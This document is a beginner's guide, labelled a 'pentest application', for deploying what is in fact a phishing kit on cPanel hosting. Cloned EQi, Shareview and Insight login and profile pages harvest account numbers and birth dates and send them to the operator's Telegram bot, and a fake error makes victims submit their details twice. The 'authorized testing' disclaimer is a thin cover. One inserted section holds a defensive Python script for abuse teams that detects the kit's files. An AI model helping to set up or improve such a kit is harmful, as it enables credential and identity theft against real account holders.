# Complete Beginner's Guide for Windows Users
## Setting Up Your Pentest Application - Step by Step

This guide assumes you have ZERO technical knowledge. We'll walk through everything together!

---

## 📋 What You'll Need

1. **A Windows Computer** (any version - Windows 10 or 11 recommended)
2. **A cPanel Hosting Account** (from providers like Hostinger, Bluehost, SiteGround, Namecheap, etc.)
3. **A Telegram Account** (download from https://telegram.org)
4. **About 30 minutes of time**

---

## Part 1: Setting Up Telegram Bot (10 minutes)

### Step 1: Download Telegram

1. Go to https://telegram.org
2. Click "Get Telegram for Windows"
3. Run the installer
4. Open Telegram and sign in with your phone number

### Step 2: Create Your Bot

1. In Telegram, click the search box at the top
2. Type: `@BotFather`
3. Click on "BotFather" with the blue checkmark (the official Telegram bot)
4. Click the "START" button at the bottom
5. Type this message: `/newbot`
6. Press Enter

### Step 3: Name Your Bot

1. BotFather will ask: "Alright, a new bot. How are we going to call it?"
2. Type any name you want, for example: `My Security Bot`
3. Press Enter
4. BotFather will ask for a username (must end with 'bot')
5. Type something like: `mysecurity123_bot`
6. Press Enter

### Step 4: Save Your Bot Token

1. BotFather will give you a message with your token
2. It looks like: `123456789:ABCdefGHIjklMNOpqrsTUVwxyz`
3. **IMPORTANT**: Copy this entire token
4. Open Notepad (search "Notepad" in Windows Start menu)
5. Paste the token and save the file as "telegram-credentials.txt" on your Desktop

### Step 5: Get Your Chat ID

1. In Telegram, find your bot (search for the username you just created)
2. Click on your bot
3. Type any message to it and press Send (example: "Hello")
4. Now open your web browser (Chrome, Edge, Firefox, etc.)
5. Copy this URL and paste it in the address bar:
   ```
   https://api.telegram.org/bot123456789:ABCdefGHIjklMNOpqrsTUVwxyz/getUpdates
   ```
   **IMPORTANT**: Replace `123456789:ABCdefGHIjklMNOpqrsTUVwxyz` with YOUR bot token from Step 4

6. Press Enter
7. You'll see some text. Look for something like: `"chat":{"id":123456789`
8. The number after `"id":` is your Chat ID
9. Copy that number
10. Go back to your Notepad file and add:
    ```
    Bot Token: 123456789:ABCdefGHIjklMNOpqrsTUVwxyz
    Chat ID: 123456789
    ```
11. Save the file

✅ **Telegram Setup Complete!** Now you have your Bot Token and Chat ID.

---

## Part 2: Preparing Your Files (5 minutes)

### Step 1: Extract the ZIP File

1. Find the ZIP file you downloaded (probably in your Downloads folder)
2. Right-click on it
3. Choose "Extract All..."
4. Click "Extract"
5. A new folder will open

### Step 2: Find the Backend Folder

1. Inside the extracted folder, you should see a folder called "backend"
2. Open it
3. You should see several files including `config.php`

---

## Part 3: Setting Up Encryption Key (5 minutes)

### Option A: Using the Web Tool (Easiest)

1. In the backend folder, find `generate-key.php`
2. Right-click on it and open with Notepad
3. Copy ALL the text
4. Go to https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler
5. Delete everything in the left box
6. Paste the code you copied
7. Click "Run"
8. You'll see a long random string - this is your encryption key
9. Copy it
10. Save it in your "telegram-credentials.txt" file:
    ```
    Bot Token: 123456789:ABCdefGHIjklMNOpqrsTUVwxyz
    Chat ID: 123456789
    Encryption Key: [paste your key here]
    ```

### Option B: Using a Random Generator (Alternative)

1. Go to https://www.random.org/strings/
2. Set these options:
   - Generate: 1 string
   - Length: 32 characters
   - Characters: Alphanumeric
3. Click "Get Strings"
4. Copy the generated string
5. Save it in your "telegram-credentials.txt" file

✅ **Encryption Key Created!**

---

## Part 4: Configuring the Backend (5 minutes)

### Step 1: Open config.php

1. In the backend folder, find `config.php`
2. Right-click on it
3. Choose "Open with" → "Notepad"

### Step 2: Update Your Credentials

Find these lines in config.php:

**Line 11** - Replace with your Bot Token:
```php
define('TELEGRAM_BOT_TOKEN', 'YOUR_BOT_TOKEN_HERE');
```
Change to:
```php
define('TELEGRAM_BOT_TOKEN', '123456789:ABCdefGHIjklMNOpqrsTUVwxyz');
```
(Use YOUR actual token!)

**Line 12** - Replace with your Chat ID:
```php
define('TELEGRAM_CHAT_ID', 'YOUR_CHAT_ID_HERE');
```
Change to:
```php
define('TELEGRAM_CHAT_ID', '123456789');
```
(Use YOUR actual chat ID!)

**Line 15** - Replace with your Encryption Key:
```php
define('ENCRYPTION_KEY', 'your-secret-encryption-key-change-this');
```
Change to:
```php
define('ENCRYPTION_KEY', 'your-32-character-random-key-from-step-3');
```
(Use YOUR actual encryption key!)

**Lines 20-22** - Replace with your domain:
```php
define('ALLOWED_ORIGINS', [
    'https://yourdomain.com',
    'https://www.yourdomain.com'
]);
```
Change to:
```php
define('ALLOWED_ORIGINS', [
    'https://your-actual-website.com',
    'https://www.your-actual-website.com'
]);
```
(Use YOUR actual domain name!)

### Step 3: Save the File

1. Click File → Save
2. Close Notepad

✅ **Backend Configured!**

---

## Part 5: Updating Frontend Files (5 minutes)

You need to tell the frontend pages where your backend is located.

### Step 1: Update Each Login Page

1. Open `login-eqi.html` with Notepad
2. Find this line (around line 145):
   ```javascript
   const API_URL = 'https://yourdomain.com/backend/api/submit.php';
   ```
3. Change it to:
   ```javascript
   const API_URL = 'https://your-actual-website.com/backend/api/submit.php';
   ```
4. Save the file

**Repeat for these files:**
- `login-shareview.html`
- `login-insight.html`
- `profile-eqi.html`
- `profile-shareview.html`
- `profile-insight.html`

**TIP**: Use Find & Replace in Notepad:
1. Press Ctrl+H
2. Find what: `https://yourdomain.com`
3. Replace with: `https://your-actual-website.com`
4. Click "Replace All"

✅ **Frontend Updated!**

---

## Part 6: Uploading to cPanel (10 minutes)

### Step 1: Log into cPanel

1. Go to your hosting provider's website
2. Log into your account
3. Find and click the "cPanel" button
4. You'll see a dashboard with lots of icons

### Step 2: Open File Manager

1. In cPanel, find the "File Manager" icon (usually in the "Files" section)
2. Click it
3. A new window opens showing your files

### Step 3: Navigate to public_html

1. On the left side, you'll see folders
2. Click on the "public_html" folder
3. This is where your website files go

### Step 4: Upload Backend Folder

1. Click the "Upload" button at the top
2. Click the "Select File" button
3. Navigate to your extracted files
4. Select the entire "backend" folder
   - **IMPORTANT**: If you can't upload a folder, do this instead:
     - Create a new folder in public_html called "backend"
     - Open that folder
     - Upload all files from your local backend folder one by one

5. Wait for the upload to complete (you'll see a progress bar)

### Step 5: Upload Frontend Files

1. Go back to the public_html folder
2. Upload all HTML files:
   - `index.html`
   - `login-eqi.html`
   - `login-shareview.html`
   - `login-insight.html`
   - `profile-eqi.html`
   - `profile-shareview.html`
   - `profile-insight.html`

### Step 6: Create Logs Folder

1. In File Manager, open the "backend" folder
2. Click the "New Folder" button
3. Name it: `logs`
4. Click "Create"
5. Right-click on the "logs" folder
6. Choose "Change Permissions"
7. Make sure these are checked:
   - Owner: Read, Write, Execute
   - Group: Read, Execute
   - World: Read, Execute
8. The number should show 755
9. Click "Save"

✅ **Files Uploaded!**

---

## Part 7: Testing Your Setup (5 minutes)

### Step 1: Test the Backend

1. In your web browser, go to:
   ```
   https://your-actual-website.com/backend/test.php
   ```
2. You should see green checkmarks (✅) for all tests
3. Check your Telegram - you should receive a test message!
4. If you see any red X marks (❌), something is wrong:
   - Check your config.php file again
   - Make sure you copied the tokens correctly
   - Make sure the logs folder exists and has correct permissions

### Step 2: Delete test.php (IMPORTANT!)

1. In cPanel File Manager, go to the backend folder
2. Find `test.php`
3. Right-click on it
4. Choose "Delete"
5. Confirm deletion

### Step 3: Test the Login Pages

1. Go to: `https://your-actual-website.com/index.html`
2. Select a service (EQi, Shareview, or Insight)
3. Click Continue
4. Fill in the login form with fake data
5. Click Continue
6. You should see an error message
7. Fill it in again
8. You should see success and redirect to profile page
9. Fill in the profile page
10. Click Submit
11. Check your Telegram - you should receive the data!

✅ **Everything Works!**

---

## Part 8: Security Hardening (Optional but Recommended)

### Install SSL Certificate (Free)

1. In cPanel, find "SSL/TLS Status"
2. Click "Run AutoSSL"
3. Wait for it to complete
4. Your site will now use HTTPS (secure)

### Enable HTTPS Redirect

1. In File Manager, go to the backend folder
2. Open the `.htaccess` file
3. Find these lines:
   ```apache
   # RewriteCond %{HTTPS} off
   # RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
   ```
4. Remove the `#` at the start of each line:
   ```apache
   RewriteCond %{HTTPS} off
   RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
   ```
5. Save the file

---

## 🎉 You're Done!

Your pentest application is now live and working!

### What Happens Now?

1. When someone visits your site and logs in, you'll receive their data in Telegram
2. Data is encrypted for security
3. Logs are stored on your server
4. Everything works automatically!

### What You'll Receive in Telegram:

```
🔐 NEW LOGIN ATTEMPT
━━━━━━━━━━━━━━━━━━━━
📱 Service: EQI
🕐 Time: 2024-02-21T10:30:00Z
🌐 User Agent: Mozilla/5.0...
📍 IP: 123.456.789.0
━━━━━━━━━━━━━━━━━━━━
📋 FORM DATA:
accountNumber: 12345
dobDay: 15
dobMonth: March
dobYear: 1990
...
```

---

## 📞 Troubleshooting

### "I don't receive Telegram messages"

1. Check that you sent a message to your bot first
2. Verify your bot token is correct in config.php
3. Verify your chat ID is correct in config.php
4. Run test.php again

### "I see 500 Internal Server Error"

1. Check that config.php has no syntax errors
2. Make sure you closed all quotes properly
3. Check file permissions (should be 644 for PHP files)

### "CORS Error in Browser Console"

1. Make sure you updated ALLOWED_ORIGINS in config.php
2. Make sure your domain matches exactly (with or without www)

### "Nothing happens when I submit forms"

1. Check browser console for errors (Press F12)
2. Make sure you updated API_URL in all HTML files
3. Verify backend folder is uploaded correctly

---

## 🔒 Security Reminders

1. **Never share your config.php file** - it contains secrets
2. **Never commit config.php to GitHub** or any public place
3. **Delete test.php after testing** - it shows system information
4. **Use HTTPS only** - install SSL certificate
5. **Change encryption key regularly** if doing long-term testing

---

## 📚 File Structure Reference

```
your-website.com/
├── index.html                    (Main page with service selector)
├── login-eqi.html               (EQi login page)
├── login-shareview.html         (Shareview login page)
├── login-insight.html           (Insight login page)
├── profile-eqi.html             (EQi profile/details page)
├── profile-shareview.html       (Shareview profile page)
├── profile-insight.html         (Insight profile page)
└── backend/
    ├── config.php               (Your configuration - KEEP SECRET!)
    ├── .htaccess               (Security settings)
    ├── api/
    │   └── submit.php          (Receives form data)
    ├── includes/
    │   ├── Encryption.php      (Handles encryption)
    │   ├── TelegramBot.php     (Sends to Telegram)
    │   ├── RateLimiter.php     (Prevents abuse)
    │   ├── FileLogger.php      (Saves logs)
    │   └── DatabaseLogger.php  (Optional database logging)
    └── logs/                    (Log files stored here)
```
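
Seen from the hosting side, the layout above is a fingerprint. The following is an added example, not part of the original guide or the application's code: a triage check that an abuse or incident-response team could run over a customer web root, using only the file and constant names listed on this page. The function names, the sample tree and the `example.test` host are constructed for illustration.

```python
import os
import re
import tempfile

# File and constant names are the ones listed on this page; nothing else is assumed.
FRONTEND = {"login-eqi.html", "login-shareview.html", "login-insight.html",
            "profile-eqi.html", "profile-shareview.html", "profile-insight.html"}
BACKEND = ("api/submit.php", "includes/TelegramBot.php")
CONFIG_RE = re.compile(r"define\(\s*['\"](TELEGRAM_BOT_TOKEN|TELEGRAM_CHAT_ID)['\"]")
API_RE = re.compile(r"API_URL\s*=\s*['\"][^'\"]*/backend/api/submit\.php")


def _read(path):
    """Read a text file, returning '' if it is missing or unreadable."""
    try:
        with open(path, errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


def triage_docroot(root):
    """Return {indicator: details} for one web root; an empty dict means no match."""
    backend = os.path.join(root, "backend")
    pages = sorted(FRONTEND & set(os.listdir(root)))
    found = {
        "frontend-pages": pages,
        "posts-to-submit.php": [n for n in pages if API_RE.search(_read(os.path.join(root, n)))],
        "backend-files": [p for p in BACKEND if os.path.isfile(os.path.join(backend, p))],
        # Record which constants are defined, never their secret values.
        "telegram-config": sorted(set(CONFIG_RE.findall(_read(os.path.join(backend, "config.php"))))),
    }
    return {name: hits for name, hits in found.items() if hits}


def demo():
    """Triage a constructed sample tree (placeholder contents, hypothetical host)."""
    samples = {
        "login-eqi.html": "const API_URL = 'https://example.test/backend/api/submit.php';",
        "backend/api/submit.php": "<?php",
        "backend/config.php": "<?php define('TELEGRAM_BOT_TOKEN', 'PLACEHOLDER');",
    }
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "backend", "api"))
        for rel, body in samples.items():
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(body)
        return triage_docroot(root)
```

A single matching file name is weak evidence on its own; pages that post to `backend/api/submit.php` together with a `config.php` defining the Telegram constants is the stronger signal.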

---

## ✅ Final Checklist

Before going live, make sure:

- [ ] Telegram bot created and tested
- [ ] config.php updated with real values
- [ ] All HTML files updated with correct API_URL
- [ ] Files uploaded to cPanel
- [ ] Logs folder created with 755 permissions
- [ ] test.php shows all green checkmarks
- [ ] test.php deleted after testing
- [ ] SSL certificate installed
- [ ] HTTPS redirect enabled
- [ ] Tested with actual form submission
- [ ] Received test data in Telegram

---

## 🎓 Congratulations!

You've successfully set up a professional pentest application!

Remember:
- This is for **authorized testing only**
- Only use on systems you have **permission** to test
- Keep your credentials **secure**
- Monitor your Telegram for incoming data

**Need help?** Review the troubleshooting section or check the included README.md for more technical details.

Good luck! 🚀
